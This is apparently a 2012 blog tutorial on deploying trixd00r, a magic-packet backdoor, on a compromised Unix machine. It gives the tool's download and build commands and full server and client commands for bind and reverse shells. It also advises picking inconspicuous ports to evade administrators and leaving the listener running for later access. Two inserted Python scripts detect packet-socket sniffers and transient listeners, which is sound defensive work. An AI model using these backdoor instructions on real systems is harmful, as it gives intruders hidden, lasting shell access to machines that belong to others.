Wednesday 10 October 2012

Hey what's up everybody, this is my first tutorial so bear with me.

Trixd00r is a great little tool from the guys over at nullsecurity: a very stealthy backdoor for any *nix system. It has a server and a client, so obviously to use it you would already need access to the box, but if you need to come back later, trixd00r is perfect for that.
Also, to run the server on the compromised machine you will need to either be root, or whatever user you are needs to be in the sudoers file and you need to know that user's password.


Alright moving on, go ahead and grab the tar file...

Code:
wget http://www.nullsecurity.net/tools/backdoor/trixd00r-0.0.1.tar.gz

Untar it...

Code:
tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

Code:
cd trixd00r-0.0.1

Okay so now we type the command make, which prints the installation directions, and you will get the following:

[Image: trix.png]

Okay so as you can see it gives us the option to install on quite a few different OSes; in this case I will choose Linux.

Code:
make linux

Alright so it should spit some stuff on your screen and when you do an ls command you should have some new goodies in the directory.

[Image: trix2k.png]

Note*
If you are using this on OS X, choose linux... you will need to have the command line utilities installed though; just go to GitHub and get the prepackaged gcc installer if you don't have time or don't want to download Xcode, otherwise you get an error about no gmake/make being present.
Oh and if Linux complains about no gmake too, just make a symbolic link from gmake to make:

Code:
ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the server (compromised machine) listens invisibly for "magic packets" sent from the client (attacker), and when it gets those packets it will either bind a shell on a TCP/UDP port of our choosing or connect back to us, again using either protocol.
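That "invisible" listening is also the angle a defender has on it: a server that waits for magic packets without binding a port still has to read raw traffic, and on Linux a libpcap-style sniffer does that through an AF_PACKET socket, which the kernel lists in /proc/net/packet regardless of what `ss -ltn` or a port scan shows. The script below is an added example written for this post, not code from nullsecurity or from trixd00r. It assumes the server sniffs through a packet socket (true of libpcap on Linux; an assumption here, since the tool's internals are not shown on this page) and that /proc has the standard layout. The /proc/net/packet table, the inode-to-process map and the process names in it are constructed sample data, and the KNOWN_SNIFFERS allowlist is a hypothetical starting list, not a vetted baseline.

```python
"""Flag processes that hold AF_PACKET (raw frame) sockets on a Linux host.

Every packet socket is listed in /proc/net/packet even when no TCP/UDP
port is bound, so a magic-packet listener shows up here while it is
invisible to `ss -ltn` and to port scans.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Type column (linux/socket.h): 2 = SOCK_DGRAM, 3 = SOCK_RAW.
SOCK_TYPES = {2: "SOCK_DGRAM", 3: "SOCK_RAW"}
# Proto column is the bound ethertype in hex; 0x0003 (ETH_P_ALL) receives every frame.
ETH_P_ALL = 0x0003
# Hypothetical allowlist of processes that open packet sockets on many hosts.
# Tune it to the host; a backdoor can name its process whatever it likes.
KNOWN_SNIFFERS = {"dhclient", "dhcpcd", "tcpdump", "wpa_supplicant", "lldpd"}


@dataclass(frozen=True)
class PacketSocket:
    sock_type: str
    proto: int
    ifindex: int
    uid: int
    inode: int

    @property
    def sees_all_frames(self) -> bool:
        return self.proto == ETH_P_ALL


def parse_proc_net_packet(text: str) -> list[PacketSocket]:
    """Parse /proc/net/packet (columns: sk RefCnt Type Proto Iface R Rmem User Inode)."""
    sockets = []
    for line in text.splitlines()[1:]:  # first line is the column header
        cols = line.split()
        if len(cols) < 9:
            continue
        _sk, _refcnt, stype, proto, iface, _run, _rmem, uid, inode = cols[:9]
        sockets.append(PacketSocket(SOCK_TYPES.get(int(stype), f"type{stype}"),
                                    int(proto, 16), int(iface), int(uid), int(inode)))
    return sockets


def socket_owners(inodes: set[int], proc: str = "/proc") -> dict[int, list[tuple[int, str]]]:
    """Map socket inodes to (pid, comm) by walking /proc/<pid>/fd; run as root to see all processes."""
    owners: dict[int, list[tuple[int, str]]] = {}
    for pid in (p for p in os.listdir(proc) if p.isdigit()):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # process exited, or not ours to inspect
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            m = re.fullmatch(r"socket:\[(\d+)\]", target)
            if not m or int(m.group(1)) not in inodes:
                continue
            try:
                with open(os.path.join(proc, pid, "comm")) as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            owners.setdefault(int(m.group(1)), []).append((int(pid), comm))
    return owners


def suspicious_sniffers(sockets, owners, allow=KNOWN_SNIFFERS) -> list[str]:
    """One finding per packet socket whose owning process is not on the allowlist."""
    findings = []
    for s in sockets:
        for pid, comm in owners.get(s.inode, [(None, "<unresolved>")]):
            if comm in allow:
                continue
            note = " ETH_P_ALL: sees every frame" if s.sees_all_frames else ""
            findings.append(f"pid={pid} comm={comm} uid={s.uid} {s.sock_type} "
                            f"proto=0x{s.proto:04x} ifindex={s.ifindex} inode={s.inode}{note}")
    return findings


# Constructed sample (not from a real host): a root-owned SOCK_RAW socket bound to
# ETH_P_ALL held by an unknown daemon, plus the DHCP client's usual packet socket.
SAMPLE_TABLE = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff8800370ec000 3      3    0003   2     1 0      0      18589
ffff88003a1f0800 3      3    0800   2     1 0      0      12044
"""
SAMPLE_OWNERS = {18589: [(4242, "trixd00rd")], 12044: [(611, "dhclient")]}

if __name__ == "__main__":
    # Live check on this host; resolving owners needs root.
    with open("/proc/net/packet") as f:
        live = parse_proc_net_packet(f.read())
    for line in suspicious_sniffers(live, socket_owners({s.inode for s in live})) or ["no unexpected packet sockets"]:
        print(line)
```

A process name is only a hint, which is why the finding carries the uid, the socket type and the ethertype: a root-owned SOCK_RAW socket bound to ETH_P_ALL from a binary you cannot account for is the signal, whatever the process calls itself.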

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!


Trixd00r Bind Connection
Now we need to set up our trixd00rd on the compromised machine, to do that we run sudo ./trixd00rd -H to get a list of options.

[Image: trix4.png]

Note*
A really cool feature is that you just put a ? after an option to see what it accepts.

So first off the -i flag is for the interface connected to the network that we'll be using... pretty self explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

[Image: trix5.png]

The default is the TCP SYN packet, which I'm just going to leave as is... the other protocols follow the same process as this one; I'll leave it up to you to play with them and discover why one would be more advantageous than the others depending on the situation.
If you don't know the different protocols and how they work, I recommend reading up on them, because they're just good to know. Not understanding even basic TCP/IP (I'm no expert) is just ignorant, especially when it's fun to learn about, and hacking/pentesting and information security has so much to do with it.


The -s flag is which shell mode we want to use, again I used a ? to see the different options...in this case we are using the TCP Bind option, which will be -s 0

[Image: trix34.png]

Alright, the two options above (-t and -s) are the most important, so I will show you the full command I used with the rest of the options, a picture, and then explain them below.

Code:
sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

[Image: trix88.png]

-b 2302 This is the port that our listener will be bound to, waiting for the magic packet to give us our shell. The default is 31337, which comes up as "Elite" on a port scan, so if the admin or user or whoever runs a scan because he's security minded, he will see that port open, and it is known as a trojan/backdoor/RAT/etc. port, so I always change my backdoor ports to shit that is a game app or some obscure port that has nothing to do with any of the above - out of sight, out of mind.
The only time this port will come up on a port scan is when you are actually interacting with trixd00rd; any other time it will just show up as closed or filtered to an outsider - that's why this is so stealthy!
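A port that is only bound while someone is talking to it is exactly what a one-off port scan misses, so the check a defender wants is a frequent sample of the kernel's own socket table diffed against a baseline of expected listeners; an unusual port number is no help against that. The script below is an added example written for this post, not code from nullsecurity or from trixd00r. It reads /proc/net/tcp (IPv4 only; /proc/net/tcp6 has the same layout with 32-hex-digit addresses and is not handled here), and the two snapshots, the sshd port 22, the port 2302 and the peer 192.168.1.5 are constructed sample data.

```python
"""Catch a TCP listener that only exists while someone is connected to it.

Polls the kernel socket table and reports LISTEN sockets that a known-good
baseline does not account for, plus who is connected to each new port.
"""
import time
from typing import Dict, Iterator, List, Set, Tuple

LISTEN, ESTABLISHED = "0A", "01"  # values of the st column in /proc/net/tcp


def hex_ipv4(h: str) -> str:
    """/proc/net/tcp prints IPv4 as little-endian hex: 0301A8C0 -> 192.168.1.3."""
    return ".".join(str(b) for b in reversed(bytes.fromhex(h)))


def _rows(proc_net_tcp: str) -> Iterator[Tuple[str, int, str, int, str, int]]:
    """Yield (local_ip_hex, local_port, remote_ip_hex, remote_port, state, inode) per socket."""
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        cols = line.split()
        if len(cols) < 10:
            continue
        lip, lport = cols[1].rsplit(":", 1)
        rip, rport = cols[2].rsplit(":", 1)
        yield lip, int(lport, 16), rip, int(rport, 16), cols[3], int(cols[9])


def listening_ports(proc_net_tcp: str) -> Dict[int, int]:
    """{port: inode} for every socket in LISTEN state."""
    return {lport: inode for _, lport, _, _, st, inode in _rows(proc_net_tcp) if st == LISTEN}


def new_listeners(baseline: Set[int], current: Dict[int, int]) -> Dict[int, int]:
    """Listeners present now that the baseline does not account for."""
    return {p: ino for p, ino in current.items() if p not in baseline}


def peers_of(proc_net_tcp: str, port: int) -> List[Tuple[str, int]]:
    """Remote (ip, port) of every established connection to a local port."""
    return [(hex_ipv4(rip), rport)
            for _, lport, rip, rport, st, _ in _rows(proc_net_tcp)
            if st == ESTABLISHED and lport == port]


def watch(baseline: Set[int], interval: float = 2.0, path: str = "/proc/net/tcp") -> None:
    """Live monitor: poll the table and report anything outside the baseline."""
    while True:
        with open(path) as f:
            snap = f.read()
        for port, inode in new_listeners(baseline, listening_ports(snap)).items():
            print(f"new LISTEN tcp/{port} inode={inode} peers={peers_of(snap, port)}")
        time.sleep(interval)


# Constructed snapshots (not from a real host). Quiet: only sshd on 22.
# Active: a listener on 2302, with 192.168.1.5:51620 connected to it.
SNAP_QUIET = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 14235 1 0000000000000000 100 0 0 10 0
"""
SNAP_ACTIVE = SNAP_QUIET + """\
   1: 00000000:08FE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 99871 1 0000000000000000 100 0 0 10 0
   2: 0301A8C0:08FE 0501A8C0:C9A4 01 00000000:00000000 00:00000000 00000000     0        0 99872 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    # One pass over the sample; call watch(baseline) with a known-good baseline for live use.
    base = set(listening_ports(SNAP_QUIET))
    for port, inode in new_listeners(base, listening_ports(SNAP_ACTIVE)).items():
        print(f"sample: new LISTEN tcp/{port} inode={inode} peers={peers_of(SNAP_ACTIVE, port)}")
```

The poll interval has to be shorter than the shortest session you expect to catch, and the inode reported for a new listener can be resolved to its process through /proc/<pid>/fd the same way as for any other socket.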

-v The -v option is for verbosity; I like to see output to know what is going on, and if something goes wrong it will say so in plain English.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

Code:
./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

[Image: trix87.png]

-h 192.168.1.3 This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.


And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

[Image: trix12.png]

Trixd00r Reverse Connection


Now everything is pretty much the same as above except a few options, so instead of explaining everything I will just show you the commands, a picture and explain the options that changed.

For the server, we will drop the -b <port> option and add the -c <connect back host IP> and change the -s from 0 to 1 (indicating we want a reverse connection instead of a bind shell) like so.


Code:
sudo ./trixd00rd -i en1 -t 0 -s 1 -c <connect back IP> -v

[Image: trix66.png]

For the client, we do the same as above, except there is no need for a -c option because the server is connecting back to us.

Code:
./trixd00r -h <target IP> -t 0 -s 1 -v

[Image: trix100.png]

Voila, perfect reverse shell connection.


Closing the Connection

To COMPLETELY close the connection we hit control+C on the client, then run the client command again with -m byebye added and hit enter; it will tell you that it sent the magic packet, which means the connection was closed and the server is NOT listening anymore.
[Image: bybye.png]

Server side if you send the byebye packet it will look like this...
[Image: trix14.png]

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.



Credits

Aight that's it, hope you enjoyed the tutorial! All credits go to http://www.nullsecurity.net for making trixd00r and also to their YouTube video, where I got all the info to make this.

I'm not an expert with this tool, although it's not like it's really complicated, but if you have any questions about it I'm glad to help...also lemme know how you liked the tutorial.

Thanks for reading, and have a good day.

1 comment:

  1. It's not working.

    +-----------------------------------------+
    | trixd00r - http://www.nullsecurity.net/ |
    +-----------------------------------------+
    [+] checking arguments
    [+] building magic packet
    [+] sending magic packet

    ........................
    Where's the shell? +_+

